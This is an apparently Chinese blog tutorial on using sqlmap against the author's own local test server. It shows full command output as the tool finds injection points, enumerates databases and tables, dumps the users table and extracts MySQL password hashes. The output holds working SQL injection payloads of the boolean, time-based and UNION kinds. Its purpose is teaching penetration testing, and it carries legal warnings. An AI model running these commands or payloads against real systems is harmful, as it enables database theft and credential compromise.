sqlmap

Sqlmap 是一个开源的渗透测试工具,可以自动检测和利用 SQL 注入缺陷以及接管数据库服务器的过程。它有一个强大的检测引擎,许多针对最终渗透测试人员的小众功能,以及从数据库指纹、从数据库获取数据、访问底层文件系统和通过带外连接在操作系统上执行命令等广泛的开关。

安装

pip install sqlmap

查看帮助文档

sqlmap -hh

中文文档

https://sqlmap.campfire.ga/

直连数据库

服务型数据库(mysql)

DBMS://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME

sqlmap -d "mysql://root:123456@127.0.0.1:3306/uniapp_shop" -f --banner --dbs --users

文件型数据库(sqlite)

DBMS://DATABASE_FILEPATH

sqlmap -d "sqlite3://D:\apiTestDjango\db.sqlite3" -f --banner --dbs --tables

初级实战

此处使用的是本地的服务,目的在于学习sqlmap的使用,请不要做违法的事情

扫描项目源码为: https://gitee.com/zy7y/uniapp_shop_server

1. 扫描注入点

命令:sqlmap -u http://127.0.0.1/v1/getnews?newid=1

(venv) D:\sqlmaptools>sqlmap -u http://127.0.0.1/v1/getnews?newid=1

        ___

       __H__

 ___ ___[,]_____ ___ ___  {1.5.5#pip}

|_ -| . ["]     | .'| . |

|___|_  [.]_|_|_|__,|  _|

      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal l

aws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 13:34:37 /2021-05-14/

[13:34:37] [INFO] resuming back-end DBMS 'mysql'

[13:34:37] [INFO] testing connection to the target URL

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: newid (GET)

    Type: boolean-based blind

    Title: AND boolean-based blind - WHERE or HAVING clause

    Payload: newid=13 AND 6236=6236

    Type: time-based blind

    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

    Payload: newid=13 AND (SELECT 8333 FROM (SELECT(SLEEP(5)))cUBu)

    Type: UNION query

    Title: Generic UNION query (NULL) - 5 columns

    Payload: newid=13 UNION ALL SELECT CONCAT(0x716a6a7a71,0x664e6179557179534a494d4b7a6a4b4263744562646f716151716744516c75476f6774666345424e,0x71786b7a71),NULL,NULL,NULL,NULL-- -

---

[13:34:37] [INFO] the back-end DBMS is MySQL

back-end DBMS: MySQL >= 5.0.12

[13:34:37] [INFO] fetched data logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1'

[*] ending @ 13:34:37 /2021-05-14/

# Title: Generic UNION query (NULL) - 5 columns 注入点

2. 根据注入点查到全部数据库 --dbs

命令:sqlmap -u http://127.0.0.1/v1/getnews?newid=1 --dbs

(venv) D:\sqlmaptools>sqlmap -u http://127.0.0.1/v1/getnews?newid=1 --dbs

        ___

       __H__

 ___ ___[']_____ ___ ___  {1.5.5#pip}

|_ -| . [']     | .'| . |

|___|_  ["]_|_|_|__,|  _|

      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal l

aws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 13:40:12 /2021-05-14/

[13:40:12] [INFO] resuming back-end DBMS 'mysql'

[13:40:12] [INFO] testing connection to the target URL

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: newid (GET)

    Type: boolean-based blind

    Title: AND boolean-based blind - WHERE or HAVING clause

    Payload: newid=13 AND 6236=6236

    Type: time-based blind

    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

    Payload: newid=13 AND (SELECT 8333 FROM (SELECT(SLEEP(5)))cUBu)

    Type: UNION query

    Title: Generic UNION query (NULL) - 5 columns

    Payload: newid=13 UNION ALL SELECT CONCAT(0x716a6a7a71,0x664e6179557179534a494d4b7a6a4b4263744562646f716151716744516c75476f6774666345424e,0x71786b7a71),NULL,NULL,NULL,NULL-- -

---

[13:40:12] [INFO] the back-end DBMS is MySQL

back-end DBMS: MySQL >= 5.0.12

[13:40:12] [INFO] fetching database names

available databases [6]:

[*] atplant

[*] information_schema

[*] mysql

[*] performance_schema

[*] sys

[*] uniapp_shop

[13:40:12] [INFO] fetched data logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1'

[*] ending @ 13:40:12 /2021-05-14/

3. 根据指定数据库来查所有表

命令:sqlmap -u http://127.0.0.1/v1/getnews?newid=1 -D uniapp_shop --tables

(venv) D:\sqlmaptools>sqlmap -u http://127.0.0.1/v1/getnews?newid=1 -D uniapp_shop --tables

        ___

       __H__

 ___ ___[.]_____ ___ ___  {1.5.5#pip}

|_ -| . [(]     | .'| . |

|___|_  [,]_|_|_|__,|  _|

      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal l

aws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 14:57:46 /2021-05-14/

[14:57:47] [INFO] resuming back-end DBMS 'mysql'

[14:57:47] [INFO] testing connection to the target URL

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: newid (GET)

    Type: time-based blind

    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

    Payload: newid=1 AND (SELECT 3711 FROM (SELECT(SLEEP(5)))aMmf)

    Type: UNION query

    Title: Generic UNION query (NULL) - 5 columns

    Payload: newid=1 UNION ALL SELECT NULL,CONCAT(0x7162626b71,0x456a5258416472737a767a5a6d624b5448444b52745770566c4e67646c58666d474376737a6f476c,0x7170706271),NULL,NULL,NULL-- -

---

[14:57:47] [INFO] the back-end DBMS is MySQL

back-end DBMS: MySQL >= 5.0.12

[14:57:47] [INFO] fetching tables for database: 'uniapp_shop'

Database: uniapp_shop

[36 tables]

+----------------------------+

| dt_article                 |

| dt_article_albums          |

| dt_article_attach          |

| dt_article_attribute_field |

| dt_article_attribute_value |

| dt_article_category        |

| dt_article_comment         |

| dt_brands                  |

| dt_channel                 |

| dt_channel_field           |

| dt_channel_site            |

| dt_express                 |

| dt_feedback                |

| dt_link                    |

| dt_mail_template           |

| dt_manager                 |

| dt_manager_log             |

| dt_manager_role            |

| dt_manager_role_value      |

| dt_navigation              |

| dt_order_goods             |

| dt_orders                  |

| dt_payment                 |

| dt_sms_template            |

| dt_user_amount_log         |

| dt_user_attach_log         |

| dt_user_code               |

| dt_user_group_price        |

| dt_user_groups             |

| dt_user_login_log          |

| dt_user_message            |

| dt_user_oauth              |

| dt_user_oauth_app          |

| dt_user_point_log          |

| dt_user_recharge           |

| dt_users                   |

+----------------------------+

[14:57:47] [INFO] fetched data logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1'

[*] ending @ 14:57:47 /2021-05-14/

3.根据表来爆字段(mysql版本>5.0)

命令:sqlmap -u http://127.0.0.1/v1/getnews?newid=1 -D uniapp_shop -T dt_users --columns

(venv) D:\sqlmaptools>sqlmap -u http://127.0.0.1/v1/getnews?newid=1 -D uniapp_shop -T dt_users --columns

        ___

       __H__

 ___ ___[)]_____ ___ ___  {1.5.5#pip}

|_ -| . [)]     | .'| . |

|___|_  ["]_|_|_|__,|  _|

      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal l

aws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 14:59:01 /2021-05-14/

[14:59:01] [INFO] resuming back-end DBMS 'mysql'

[14:59:01] [INFO] testing connection to the target URL

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: newid (GET)

    Type: time-based blind

    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

    Payload: newid=1 AND (SELECT 3711 FROM (SELECT(SLEEP(5)))aMmf)

    Type: UNION query

    Title: Generic UNION query (NULL) - 5 columns

    Payload: newid=1 UNION ALL SELECT NULL,CONCAT(0x7162626b71,0x456a5258416472737a767a5a6d624b5448444b52745770566c4e67646c58666d474376737a6f476c,0x7170706271),NULL,NULL,NULL-- -

---

[14:59:01] [INFO] the back-end DBMS is MySQL

back-end DBMS: MySQL >= 5.0.12

[14:59:01] [INFO] fetching columns for table 'dt_users' in database 'uniapp_shop'

Database: uniapp_shop

Table: dt_users

[22 columns]

+-----------+--------------+

| Column    | Type         |

+-----------+--------------+

| exp       | int          |

| address   | varchar(255) |

| amount    | double       |

| area      | varchar(255) |

| avatar    | varchar(255) |

| birthday  | timestamp    |

| email     | varchar(50)  |

| group_id  | int          |

| id        | int          |

| mobile    | varchar(20)  |

| msn       | varchar(100) |

| nick_name | varchar(100) |

| password  | varchar(100) |

| point     | int          |

| qq        | varchar(20)  |

| reg_ip    | varchar(20)  |

| reg_time  | timestamp    |

| salt      | varchar(20)  |

| sex       | varchar(20)  |

| status    | int          |

| telphone  | varchar(50)  |

| user_name | varchar(100) |

+-----------+--------------+

[14:59:02] [INFO] fetched data logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1'

[*] ending @ 14:59:02 /2021-05-14/

4. 根据字段名查到表中的数据

注意:当使用了--dump 已经触法了法律,请不要恶意攻击他人服务

命令:sqlmap -u http://127.0.0.1/v1/getnews?newid=1 --batch -D uniapp_shop -T dt_users -C user_name,id --dump

(venv) D:\sqlmaptools>sqlmap -u http://127.0.0.1/v1/getnews?newid=1 --batch -D uniapp_shop -T dt_users -C user_name,id --dump

        ___

       __H__

 ___ ___[']_____ ___ ___  {1.5.5#pip}

|_ -| . [)]     | .'| . |

|___|_  [']_|_|_|__,|  _|

      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal l

aws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 15:03:52 /2021-05-14/

[15:03:52] [INFO] resuming back-end DBMS 'mysql'

[15:03:52] [INFO] testing connection to the target URL

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: newid (GET)

    Type: time-based blind

    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

    Payload: newid=1 AND (SELECT 3711 FROM (SELECT(SLEEP(5)))aMmf)

    Type: UNION query

    Title: Generic UNION query (NULL) - 5 columns

    Payload: newid=1 UNION ALL SELECT NULL,CONCAT(0x7162626b71,0x456a5258416472737a767a5a6d624b5448444b52745770566c4e67646c58666d474376737a6f476c,0x7170706271),NULL,NULL,NULL-- -

---

[15:03:52] [INFO] the back-end DBMS is MySQL

back-end DBMS: MySQL >= 5.0.12

[15:03:52] [INFO] fetching entries of column(s) 'id,user_name' for table 'dt_users' in database 'uniapp_shop'

Database: uniapp_shop

Table: dt_users

[1 entry]

+-----------+----+

| user_name | id |

+-----------+----+

| test      | 1  |

+-----------+----+

[15:03:53] [INFO] table 'uniapp_shop.dt_users' dumped to CSV file 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1\dump\uniapp_shop\dt_users.csv'

[15:03:53] [INFO] fetched data logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1'

[*] ending @ 15:03:53 /2021-05-14/

5. 获取当前数据库用户及hash密码

命令: sqlmap -u http://127.0.0.1/v1/getnews?newid=1 --passwords

(venv) D:\sqlmaptools>sqlmap -u http://127.0.0.1/v1/getnews?newid=1 --passwords

        ___

       __H__

 ___ ___[(]_____ ___ ___  {1.5.5#pip}

|_ -| . [']     | .'| . |

|___|_  [(]_|_|_|__,|  _|

      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal l

aws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 14:40:02 /2021-05-14/

[14:40:02] [INFO] resuming back-end DBMS 'mysql'

[14:40:02] [INFO] testing connection to the target URL

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: newid (GET)

    Type: boolean-based blind

    Title: AND boolean-based blind - WHERE or HAVING clause

    Payload: newid=13 AND 6236=6236

    Type: time-based blind

    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

    Payload: newid=13 AND (SELECT 8333 FROM (SELECT(SLEEP(5)))cUBu)

    Type: UNION query

    Title: Generic UNION query (NULL) - 5 columns

    Payload: newid=13 UNION ALL SELECT CONCAT(0x716a6a7a71,0x664e6179557179534a494d4b7a6a4b4263744562646f716151716744516c75476f6774666345424e,0x71786b7a71),NULL,NULL,NULL,NULL-- -

---

[14:40:02] [INFO] the back-end DBMS is MySQL

back-end DBMS: MySQL >= 5.0.12

[14:40:02] [INFO] fetching database users password hashes

do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y

do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] y

[14:40:05] [WARNING] no clear password(s) found

database management system users password hashes:

[*] develop [1]:

    password hash: $A$005$~W\\u0005K\\u000b\\u0017d\\u0013\\u0002*4j_s Qg\\u0007\\u0015\\u0001GlIeJWW2iJzFpb0bGTlr5.6kBD1hAQt2iQefbUbepKD

[*] mysql.infoschema [1]:

    password hash: $A$005$THISISACOMBINATIONOFINVALIDSALTANDPASSWORDTHATMUSTNEVERBRBEUSED

[*] mysql.session [1]:

    password hash: $A$005$THISISACOMBINATIONOFINVALIDSALTANDPASSWORDTHATMUSTNEVERBRBEUSED

[*] mysql.sys [1]:

    password hash: $A$005$THISISACOMBINATIONOFINVALIDSALTANDPASSWORDTHATMUSTNEVERBRBEUSED

[*] root [2]:

    password hash: $A$005$\\u0013`|dCsg\\u0001^)_s\\u001dL\\u0010n-jx^61Eh8FZrw86xs/5fy7xSwpJ9rmmaZ9iyou1PCK74aRC

    password hash: $A$005$z#r<]P\\u000eneGN\\u0014P_m\\u0007tk&av.YQwaEJ5AqX5Mv9.OiaWV/IlOiYM.C3veKIaAjpwq3

[14:40:05] [INFO] fetched data logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1'

[*] ending @ 14:40:05 /2021-05-14/

最后

请不要恶意使用其来攻击他人服务,不要触碰法律,高级用法请查看官方文档

参考资料

sqlmap中文文档

sql注入实战讲解

SQL注入:Sqlmap初体验的更多相关文章

  1. Spring JDBCTemplate连接SQL Server之初体验

    前言 在没有任何框架的帮助下我们操作数据库都是用jdbc,耗时耗力,那么有了Spring,我们则不用重复造轮子了,先来试试Spring JDBC增删改查,其中关键就是构造JdbcTemplate类. ...

  2. SQL注入--SQLMap过WAF

    单引号被过滤情况: 空格.等号未被过滤情况: select被过滤情况: 以此类推,当sqlmap注入出现问题时,比如不出数据,就要检查对应的关键词是否被过滤. 比如空格被过滤可以使用space2com ...

  3. 一次对真实网站的SQL注入———SQLmap使用

    网上有许多手工注入SQL的例子和语句,非常值得我们学习,手工注入能让我们更加理解网站和数据库的关系,也能明白为什么利用注入语句能发现网站漏洞. 因为我是新手,注入语句还不太熟悉,我这次是手注发现的注点 ...

  4. Saturday SQL Server 2016 初体验

    最近在开发一个有关数据库的项目,我想用SQLite,但是SQLite的设计器不是特别友好,然后据说VS有一个集成的SQLite设计器,但是我用的VS2017亲测并没有,用户体验不佳,所以安装一个SQL ...

  5. 普通SQL注入

    安全防御:过滤/转义非法参数,屏蔽SQL查询错误. 工具:Firefox,hackbar,sqlmap,burpsuite 1.联想tms站 例1, 联想tms站fromCity参数存在普通SQL注入 ...

  6. SQL注入(dvwa环境)

    首先登录DVWA主页: 1.修改安全级别为LOW级(第一次玩别打脸),如图中DVWA Security页面中. 2.进入SQL Injection页面,出错了.(心里想着这DVWA是官网下的不至于玩不 ...

  7. 2017-2018-2 20179204《网络攻防实践》第十一周学习总结 SQL注入攻击与实践

    第1节 研究缓冲区溢出的原理,至少针对两种数据库进行差异化研究 1.1 原理 在计算机内部,输入数据通常被存放在一个临时空间内,这个临时存放的空间就被称为缓冲区,缓冲区的长度事先已经被程序或者操作系统 ...

  8. sql注入知识点

    需找sql注入点1\无特定目标inurl:.php?id= 2\有特定目标:inurl:.php?id= site:target.com 3\工具爬取spider,对搜索引擎和目标网站的链接进行爬取 ...

  9. 防止sql注入和sqlmap介绍

    sql注入问题从WEB诞生到现在也一直没停过,各种大小公司都出现过sql注入问题,导致被拖库,然后存在社工库撞库等一系列影响. 防止sql注入个人理解最主要的就一点,那就是变量全部参数化,能根本的解决 ...

随机推荐

  1. PTE 准备之 Read aloud

    Read aloud A text appears on screen.Read the text aloud rext up tp 60 words varies by task, dependin ...

  2. gstreamer常用命令

    由于有好一段时间没做GStreamer相关项目了,早前的一些记录需要做下记录,以待需要的时候查阅. 还是分几个小节来介绍吧,这样思路清晰一点.(格式有点乱,没时间整理,读者自行脑补) 1. 播放视频. ...

  3. MyBatis、Spring、SpringMVC 源码下载地址

    MyBatis.Spring.SpringMVC 源码下载地址 github mybatis https://github.com/fengyu415/MyBatis-Learn.git spring ...

  4. 【linux】驱动-5-驱动框架分层分离&实战

    目录 前言 5. 分离分层 5.1 回顾-设备驱动实现 5.2 分离分层 5.3 设备 5.4 驱动 5.5 系统,模块 5.6 Makefile 参考: 前言 5. 分离分层 本章节记录实现LED驱 ...

  5. MySQL常见的七种锁详细介绍()

    原地址: https://blog.csdn.net/Saintyyu/article/details/91269087

  6. 「性能提升」扩展 Spring Cache 支持多级缓存

    为什么多级缓存 缓存的引入是现在大部分系统所必须考虑的 redis 作为常用中间件,虽然我们一般业务系统(毕竟业务量有限)不会遇到如下图 在随着 data-size 的增大和数据结构的复杂的造成性能下 ...

  7. 20 行简单实现一个 unstated-next 🎅

    前言 unstated-next 基于 React 心智模型(hook+context)而设计的状态管理. 在 react hook 出现之前,有基于单一数据源,使用纯函数修改状态的 redux &a ...

  8. 解决IDEA Gradle构建报错"Cause: zip END header not found"

    1 问题描述 某天使用Gradle构建项目时,IDEA报错如下: 2 原因 原因是下载的Gradle,也就是zip压缩包不完整,导致无法使用Gradle构建. 3 解决方法 3.1 删除本地缓存重新下 ...

  9. 1045 Favorite Color Stripe

    Eva is trying to make her own color stripe out of a given one. She would like to keep only her favor ...

  10. linux 安装rabbitMQ详细教程

    经过第一次的安装失败, 第二次总算是成功了, 这里总结一下. 第一步:下载版本对应的rpm安装包 1. 下载Erlang安装包:RabbitMQ是Erlang语言编写,所以Erang环境必须要有,注: ...